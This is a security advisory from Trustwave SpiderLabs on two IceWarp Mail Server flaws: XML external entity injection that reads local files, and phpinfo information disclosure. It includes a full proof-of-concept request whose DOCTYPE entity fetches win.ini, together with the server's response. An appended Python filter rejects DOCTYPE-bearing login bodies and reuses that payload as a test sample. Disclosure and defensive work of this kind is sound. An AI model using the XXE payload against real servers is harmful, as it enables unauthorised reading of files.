IceWarp Mail Server Injection / Information Disclosure

Published: 23 Sep 2011. Reported by: trustwave.com. Type: packetstorm. Source: packetstormsecurity.com

IceWarp Mail Server Injection / Information Disclosure. Trustwave's SpiderLabs Security Advisory TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server. XML External Entity Injection allows access to local files. PHP Information Disclosure exposes PHP version and configuration settings. Vendor response: Addressed in version 10.3.3

`Trustwave's SpiderLabs Security Advisory TWSL2011-013:  
Multiple Vulnerabilities in IceWarp Mail Server  
  
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt  
  
Published: 2011-09-23  
Version: 1.0  
  
Vendor: IceWarp (http://www.icewarp.com)  
Product: IceWarp Mail Server  
Version affected: 10.3.2 and below  
  
Product description: IceWarp WebMail is the web front-end for the IceWarp  
Mail Server, which provides email access on over 50,000 servers. IceWarp  
WebMail provides web-based access to email, calendars, contacts, files  
and shared data from any computer with a browser and Internet connection.  
  
Credit: David Kirkpatrick of Trustwave's SpiderLabs  
  
Finding 1: XML External Entity Injection  
CVE: CVE-2011-3579  
  
An external entity is a feature of the XML specification which allows XML  
documents to reference resources external to the XML document. This  
functionality causes the application's XML parser to access the  
resource specified.  
  
In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to  
access local files on the operating system where the IceWarp server is  
installed. Using this technique it is possible to retrieve readable files  
on the operating system. This attack can also be used to create a possible  
denial of service condition.  
  
Proof-of-Concept:  
  
The following POST request was sent to the host A.B.C.D where the IceWarp  
mail server was running:  
  
REQUEST  
=========  
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1  
Host: A.B.C.D  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-gb,en;q=0.5  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D  
Content-Length: 249  
Content-Type: application/xml;charset=UTF-8  
Pragma: no-cache  
Cache-Control: no-cache  
  
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq  
type="set"><query  
xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c  
6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc  
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><  
/query></iq>  
  
RESPONSE:  
==========  
HTTP/1.1 200 OK  
Server: IceWarp/9.4.2  
Date: Wed, 20 Jul 2011 10:04:56 GMT  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Content-Type: text/xml  
Vary: Accept-Encoding  
Content-Length: 1113  
  
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error  
uid="login_invalid">test; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1  
....TRUNCATED  
  
The above proof-of-concept would retrieve the c:\windows\win.ini file (the  
response in this example has been truncated).  
  
  
Finding 2: PHP Information Disclosure  
CVE: CVE-2011-3580  
  
It is possible to retrieve the PHP information page (the output of  
phpinfo()) by accessing the URL http://A.B.C.D/server, where A.B.C.D is  
the IP address of the server running the IceWarp software. The response is  
a page detailing the PHP version in use and the PHP configuration  
settings, including system details.  
  
  
Vendor Response: These issues have been addressed as of version 10.3.3  
  
Remediation Steps: Customers should update to the latest version of IceWarp  
Mail Server in order to address these issues. The above issues have been  
corrected in version 10.3.3.  
  
Revision History:  
08/03/11 - Vulnerability disclosed  
09/19/11 - Patch released  
09/23/11 - Advisory published  
  
  
About Trustwave: Trustwave is the leading provider of on-demand and  
subscription-based information security and payment card industry  
compliance management solutions to businesses and government entities  
throughout the world. For organizations faced with today's challenging  
data security and compliance environment, Trustwave provides a unique  
approach with comprehensive solutions that include its flagship  
TrustKeeper compliance management software and other proprietary security  
solutions. Trustwave has helped thousands of organizations--ranging from  
Fortune 500 businesses and large financial institutions to small and  
medium-sized retailers--manage compliance and secure their network  
infrastructure, data communications and critical information assets.  
Trustwave is headquartered in Chicago with offices throughout North  
America, South America, Europe, Africa, China and Australia. For more  
information, visit https://www.trustwave.com  
  
About Trustwave's SpiderLabs: SpiderLabs is the advanced security team at  
Trustwave responsible for incident response and forensics, ethical hacking  
and application security tests for Trustwave's clients. SpiderLabs has  
responded to hundreds of security incidents, performed thousands of ethical  
hacking exercises and tested the security of hundreds of business  
applications for Fortune 500 organizations. For more information visit  
https://www.trustwave.com/spiderlabs  
  
Disclaimer: The information provided in this advisory is provided "as is"  
without warranty of any kind. Trustwave disclaims all warranties, either  
express or implied, including the warranties of merchantability and fitness  
for a particular purpose. In no event shall Trustwave or its suppliers be  
liable for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
  
  
  
  
  
`
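For Finding 1, a login `<iq>` body never needs a DTD, so a gateway or input filter can refuse any request that declares one before an entity is resolved. The following is an added example, not code from the advisory or from IceWarp; the function names and the sample bodies (shaped like the advisory's request, with a placeholder digest) are assumptions.

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """The body declares a DTD, which a login <iq> never needs."""


def extract_username(body: bytes) -> str:
    """Return the <username> text, refusing any body that carries a DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()
    path, chunks = [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at the DOCTYPE itself, before any <!ENTITY ...> is processed.
        raise ForbiddenXML(f"DOCTYPE '{name}' declared in request body")

    def on_text(data):
        if path[-3:] == ["iq", "query", "username"]:
            chunks.append(data)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: path.append(name)
    parser.EndElementHandler = lambda name: path.pop()
    parser.CharacterDataHandler = on_text
    parser.Parse(body, True)
    return "".join(chunks)


def screen(body: bytes) -> tuple:
    """Gateway verdict: ('accept', username) or ('reject', reason)."""
    try:
        return ("accept", extract_username(body))
    except ForbiddenXML as exc:
        return ("reject", str(exc))
    except xml.parsers.expat.ExpatError as exc:
        return ("reject", f"malformed XML: {exc}")


# Constructed samples shaped like the advisory's request; the digest is a placeholder.
CLEAN = (b'<iq type="set"><query xmlns="webmail:iq:auth"><username>test</username>'
         b'<digest>PLACEHOLDER</digest><method>RSA</method></query></iq>')
WITH_DTD = (b'<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///c:/windows/win.ini"> ]>'
            + CLEAN.replace(b"test<", b"test&x;<"))

if __name__ == "__main__":
    for sample in (CLEAN, WITH_DTD):
        print(screen(sample))
```

Rejections from `screen` are worth logging with the source address, since a DOCTYPE in a webmail login request has no legitimate use.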
